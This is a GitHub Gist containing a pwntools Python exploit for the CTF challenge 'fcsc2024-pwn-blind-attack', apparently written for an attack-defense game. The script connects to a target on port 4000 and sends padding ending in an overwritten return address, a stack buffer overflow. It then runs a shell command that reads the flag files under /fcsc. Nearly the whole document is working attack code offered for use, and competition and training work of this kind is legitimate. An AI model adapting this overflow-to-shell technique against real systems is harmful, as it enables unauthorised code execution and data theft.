Created
January 2, 2025 21:05
-
-
Save GuillaumeMorini/3245c26405e9955b095873a928d95862 to your computer and use it in GitHub Desktop.
Challenge fcsc2024-pwn-blind-attack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import os | |
| from pwn import * | |
| # Set logging level | |
| context.log_level = "DEBUG" # or INFO, WARNING, ERROR | |
| # Load environment variables | |
| # EXTRA is an array of the flagids for current service and team | |
| HOST = os.getenv("TARGET_IP") | |
| EXTRA = json.loads(os.getenv("TARGET_EXTRA", "[]")) | |
| # Connect to remote and run the actual exploit | |
| # Timeout is important to prevent stall | |
| r = remote(HOST, 4000, typ="tcp", timeout=2) | |
| data = r.recvuntil(b'e note summary.\n') | |
| r.sendline(b'n') | |
| data = r.recvuntil(b'vuVE8\nContent: \n') | |
| r.sendline(b'PjiFs69P7liiKPaKS73Ym9IyPSAhw21Nd2xCCfbQSMboGcFfkYMjmY99ScBS2yjmZySDQDin64MwLI9ZhPqd1a5UZ3jpXXzv553SSHnQ7bDzLeBD5VRNMswiv36fHMu1RxkUMIRkpCqkTU2IQjZcSgF5SXOek0ifAGDXtyl1UUB34CPAqPbTq7eAtGVCoIChiYPoJJrW1JR5s6QNZWVKT7Jf5KbchBjIJjUMmbG6\xe5\x16@\x00\x00\x00\x00\x00') | |
| r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*') | |
| #data = r.recvuntil(b'ca8f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n') | |
| # Use the following to capture all remaining bytes: | |
| data = r.recvall(timeout=5) | |
| print(data) | |
| r.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment